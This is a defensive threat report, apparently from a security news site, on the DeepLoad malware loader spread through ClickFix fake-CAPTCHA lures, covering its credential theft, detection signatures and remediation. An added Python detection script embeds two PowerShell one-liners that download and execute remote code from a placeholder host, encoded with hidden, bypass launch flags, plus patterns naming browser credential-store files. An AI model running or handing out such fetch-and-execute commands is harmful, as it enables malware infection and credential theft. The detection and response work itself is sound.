Key Takeaway
DeepLoad is a new malware loader delivered via the ClickFix social engineering tactic, identified by ReliaQuest researchers. It uses likely AI-assisted obfuscation and process injection to evade static detection, and begins stealing credentials and session tokens immediately upon execution — before the primary loader can be blocked. Windows endpoints without PowerShell restrictions or application control policies are the primary targets.
Malware Family and Delivery Mechanism
DeepLoad is a previously undocumented malware loader distributed via the ClickFix social engineering technique. Identified and named by ReliaQuest researchers, DeepLoad represents a new loader family designed to survive partial detection by initiating credential theft operations immediately upon execution — before any primary loader component can be blocked.
ClickFix is a well-documented delivery tactic in which victims are shown a fake error message or CAPTCHA prompt that instructs them to "fix" or "verify" by running a command themselves. The lure page typically copies a malicious PowerShell or cmd one-liner to the clipboard with JavaScript and tells the user to open the Run dialog (Win+R), paste, and press Enter. Because the user executes the payload directly, no attachment or download crosses an email gateway or browser download control. ClickFix has previously been associated with campaigns distributing NetSupport RAT, Lumma Stealer, and AsyncRAT, among others. DeepLoad now joins that list as a purpose-built loader specifically paired with this delivery method.
Capabilities
Persistence
DeepLoad establishes persistence on infected hosts through mechanisms consistent with other loaders in its class. Specific registry keys, scheduled tasks, or startup folder entries used by DeepLoad are under active analysis by ReliaQuest, but the loader's architecture is designed to survive reboots and partial remediation attempts.
Credential Theft and Exfiltration
The most operationally significant characteristic of DeepLoad is its immediate credential harvesting behavior. According to ReliaQuest researchers, credential theft initiates at the earliest stage of execution — capturing stored passwords and active session tokens from browsers and potentially other credential stores before the primary loader component completes deployment. This means that even if endpoint detection and response (EDR) tools or antivirus products block the loader's later-stage activity, the attacker may already have exfiltrated valid credentials and session cookies.
This design separates DeepLoad from loaders that gate exfiltration behind successful full-chain execution. SOC teams should treat any ClickFix-initiated execution event as a credential compromise incident regardless of whether the payload was subsequently quarantined.
Obfuscation and Evasion
ReliaQuest attributes DeepLoad's evasion capability to likely AI-assisted obfuscation combined with process injection techniques. The obfuscation targets static analysis engines, making signature-based detection unreliable against this loader. Process injection lets DeepLoad run inside the memory of legitimate processes, so tools that rely on process-creation telemetry alone see a trusted image rather than a new suspicious process; visibility then depends on injection telemetry (remote thread creation, cross-process memory writes) and on what the injected process does next, such as reading credential stores or opening outbound connections.
The use of AI-assisted code obfuscation — where large language models or AI tooling are used to generate syntactically varied but functionally equivalent malicious code — produces payloads that defeat many YARA rules and static hash-based detection mechanisms. Each generated sample can present a unique byte sequence while preserving the same runtime behavior.
Command and Control (C2)
DeepLoad's C2 infrastructure details are still being characterized by ReliaQuest. The loader communicates with attacker-controlled infrastructure to receive secondary payloads and transmit harvested credentials. Organizations should monitor for anomalous outbound HTTP/S traffic from hosts that recently executed PowerShell via user-initiated Run dialog events.
Affected Platforms
DeepLoad targets Windows endpoints. The ClickFix delivery mechanism requires user interaction within a Windows environment (Run dialog, PowerShell, or cmd). No macOS or Linux variants have been identified at this stage of analysis.
High-risk targets include organizations where users have local execution permissions and where PowerShell is not constrained by Constrained Language Mode or application control policies such as Windows Defender Application Control (WDAC) or AppLocker.
Detection Signatures
SOC analysts should prioritize the following detection logic:
Process Execution Indicators
- PowerShell or cmd spawned directly from explorer.exe following a user interaction event with no parent application context
- Use of mshta.exe, wscript.exe, or cscript.exe as intermediary execution hosts post-ClickFix prompt
- Process injection into svchost.exe, explorer.exe, or browser processes shortly after PowerShell execution
YARA Considerations
Due to AI-assisted obfuscation, static YARA rules targeting specific byte sequences will have limited coverage. Focus YARA rules on structural patterns: encoded or hidden PowerShell launch flags (-EncodedCommand, -Enc, -NoP, -W Hidden, -ExecutionPolicy Bypass) and known ClickFix lure string patterns in script content. Decode -EncodedCommand payloads (base64 of UTF-16LE) before matching, and pair flag matches with parent-process context, since administrative scripts use the same flags from legitimate parents.
SIEM Rules
- Alert on clipboard-paste execution patterns: powershell.exe with command-line arguments characteristic of pasted, encoded commands
- Correlate with browser credential store access events (Login Data, Cookies SQLite files) occurring within seconds of PowerShell execution
- Flag any access to %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data (cookies live under Default\Network\Cookies in current Chrome builds), the equivalent %LOCALAPPDATA%\Microsoft\Edge\User Data path, or the Firefox logins.json and cookies.sqlite files under %APPDATA%\Mozilla\Firefox\Profiles, within 60 seconds of a suspicious process spawn. Note that Chromium stores are under the Local profile directory, not the Roaming %APPDATA% path.
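The structural detection described under YARA Considerations and the SIEM correlation rules above, combined into one piece of detection logic, as an added example that is not part of the original article or of ReliaQuest's analysis. It runs over constructed Sysmon-style records; the host names, the example.invalid URL, the lure-comment strings and the two script variants are assumptions for illustration. The two variants are functionally equivalent but byte-different, which is the point made about AI-assisted obfuscation: their command-line hashes differ while the structural verdict is identical.

```python
"""Structural detection of a ClickFix-style PowerShell launch, correlated with
browser credential-store access in the following 60 seconds.

Added example, not code from ReliaQuest or from the original article. All log
records below are constructed. The lure-comment patterns and the
example.invalid URL are assumptions for illustration."""
import base64
import hashlib
import re
from datetime import datetime, timedelta

# Launch flags typical of pasted, encoded commands (the structural patterns the
# YARA/SIEM guidance recommends instead of byte signatures).
ENCODED_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand|nop|noprofile"
    r"|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b")
# Lure comments ClickFix pages commonly embed in the pasted command (assumption).
LURE_STRINGS = re.compile(r"(?i)i am not a robot|recaptcha|verification id|fix it")
# Chromium-family and Firefox credential stores.
CRED_STORE = re.compile(
    r"(?i)\\User Data\\[^\\]+\\(?:Network\\)?(?:Login Data|Cookies)$"
    r"|\\Profiles\\[^\\]+\\(?:logins\.json|cookies\.sqlite)$")
WINDOW = timedelta(seconds=60)


def encode_ps(script):
    """Encode a script as PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Two functionally equivalent payloads with different variable names and lure
# comments: same behaviour, different bytes, different hashes.
VARIANT_A = ("# I am not a robot - reCAPTCHA Verification ID: 7421\n"
             "$u='http://example.invalid/p';iex (New-Object Net.WebClient).DownloadString($u)")
VARIANT_B = ("# Fix it - Verification ID: 9932\n"
             "$t='http://example.invalid/p';Invoke-Expression ((New-Object Net.WebClient).DownloadString($t))")

# Constructed telemetry: process creations and file accesses, Sysmon-style.
LOG = [
    {"ts": "2025-01-15T09:58:40", "type": "process", "host": "WS01", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ts": "2025-01-15T10:02:11", "type": "process", "host": "WS01", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_ps(VARIANT_A)},
    {"ts": "2025-01-15T10:02:19", "type": "file", "host": "WS01", "image": "powershell.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ts": "2025-01-15T10:02:20", "type": "file", "host": "WS01", "image": "powershell.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"ts": "2025-01-15T10:05:00", "type": "process", "host": "WS02", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -ep bypass -w hidden -ec " + encode_ps(VARIANT_B)},
    # Firefox reading its own store 105 s later: outside the window, not counted.
    {"ts": "2025-01-15T10:06:45", "type": "file", "host": "WS02", "image": "firefox.exe",
     "path": r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\logins.json"},
]


def is_clickfix_launch(ev):
    """Shell spawned by explorer.exe (Run dialog / desktop) with encoded-launch flags."""
    return (ev["type"] == "process"
            and ev["parent"].lower() == "explorer.exe"
            and ev["image"].lower() in {"powershell.exe", "pwsh.exe", "cmd.exe"}
            and ENCODED_FLAGS.search(ev["cmdline"]) is not None)


def analyze(events):
    """One finding per suspicious launch, escalated if a credential store was read within WINDOW."""
    events = sorted(events, key=lambda e: e["ts"])
    findings = []
    for ev in events:
        if not is_clickfix_launch(ev):
            continue
        t0 = datetime.fromisoformat(ev["ts"])
        decoded = decode_encoded_command(ev["cmdline"]) or ""
        cred_hits = [f["path"] for f in events
                     if f["type"] == "file" and f["host"] == ev["host"]
                     and t0 <= datetime.fromisoformat(f["ts"]) <= t0 + WINDOW
                     and CRED_STORE.search(f["path"])]
        findings.append({
            "host": ev["host"], "ts": ev["ts"],
            # The hash differs per variant; the structural verdict does not.
            "cmdline_sha256": hashlib.sha256(ev["cmdline"].encode()).hexdigest(),
            "lure_comment": bool(LURE_STRINGS.search(decoded)),
            "fetches_remote_code": bool(re.search(r"(?i)downloadstring|iex\b|invoke-expression", decoded)),
            "cred_store_hits": cred_hits,
            "severity": "credential-compromise" if cred_hits else "suspicious-launch",
        })
    return findings


if __name__ == "__main__":
    for f in analyze(LOG):
        print(f["ts"], f["host"], f["severity"], f["cmdline_sha256"][:12], f["cred_store_hits"])
```

Run stand-alone it reports WS01 as a credential compromise (Login Data and Cookies read eight seconds after the launch) and WS02 as a suspicious launch only; the benign -File launch from explorer.exe is not flagged because it carries none of the encoded-launch flags. Per the guidance above, the WS02 case should still be handled as a credential incident, because the absence of a file-access event in the window may only mean the telemetry is incomplete.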
Network Detection
- Inspect for DNS lookups and HTTP/S connections to newly registered domains from host processes not normally initiating external connections
- Flag POST requests containing base64-encoded blobs to external IPs from PowerShell or injected processes
Removal Guidance
- Isolate the host immediately upon confirmed DeepLoad execution — do not wait for C2 confirmation before containment.
- Treat all stored credentials as compromised. Initiate forced password resets for the affected user account across all services. Invalidate active sessions and OAuth tokens.
- Revoke browser-stored credentials and session cookies enterprise-wide for the affected user. Notify downstream SaaS platforms if SSO tokens may have been captured.
- Run a full memory forensic capture before reimaging to support IOC extraction and C2 infrastructure identification.
- Reimage the affected endpoint. Given process injection and persistence mechanisms, in-place remediation is insufficient.
- Enforce PowerShell Constrained Language Mode by deploying WDAC or AppLocker in enforcement mode; CLM is only enforced when such a policy applies, and the PowerShell execution policy on its own is not a security boundary (pasted ClickFix commands routinely pass -ExecutionPolicy Bypass). The same policies block unsigned script execution.
- Block ClickFix lure delivery vectors by enforcing web proxy policies that flag pages containing clipboard-hijacking JavaScript patterns (for example navigator.clipboard.writeText or document.execCommand('copy') invoked from a fake CAPTCHA or error dialog). Where users do not need it, remove the Run dialog via Group Policy to take away the execution path the lure depends on.
ReliaQuest continues active analysis of DeepLoad. Organizations using ReliaQuest's GreyMatter platform should ensure threat intelligence feeds are current. No CVE IDs have been assigned to this campaign as no vulnerability exploitation has been confirmed — delivery relies entirely on user-initiated execution.
Original Source
The Hacker News
Related Articles
Horabot Dropper Delivers Casbaneiro Banking Trojan to Latin American and European Targets in Brazilian eCrime Campaign
The Horabot dropper, attributed to Brazilian cybercrime group Augmented Marauder (also tracked as Water Saci by Trend Micro), delivers the Casbaneiro banking trojan to Spanish-speaking users across Latin America and Europe via targeted phishing campaigns. Casbaneiro performs credential harvesting through overlay attacks, clipboard hijacking, and keylogging, and abuses compromised Outlook accounts to self-propagate. SOC teams should implement scheduled task creation detections, block newly registered TLD outbound connections, and immediately rotate credentials on any confirmed infected host.
REF1695: Fake Installers Deliver RATs and Cryptominers in CPA Fraud Operation Active Since November 2023
REF1695 is a financially motivated campaign tracked by Elastic Security Labs that has deployed RATs and cryptocurrency miners via fake software installers since November 2023. The operation monetizes infections through both passive cryptomining and CPA fraud, redirecting victims to content locker pages disguised as software registration flows. Windows endpoints are the confirmed target, and Elastic has released EQL detection rules to support identification and response.
Automated Service Enables Persistent Information-Stealing Social Engineering Attacks
A new cybercrime service automates persistent social engineering attacks aimed at stealing sensitive information. Targeting primarily Windows and mobile platforms, the service uses phishing techniques combined with encrypted exfiltration and adaptive persistence. Detection relies on monitoring phishing indicators and network anomalies, while removal requires credential resets and endpoint remediation.
NoVoice Android Malware Exploits Known Vulnerabilities to Gain Root Access, Found in 50+ Google Play Apps
NoVoice is a newly discovered Android malware exploiting known privilege escalation vulnerabilities to gain root access. Distributed through over 50 malicious apps on Google Play with 2.3 million downloads, it collects user data and communicates with encrypted C2 servers. Detection requires monitoring root-level activity and network anomalies, while removal demands a factory reset and patching affected devices.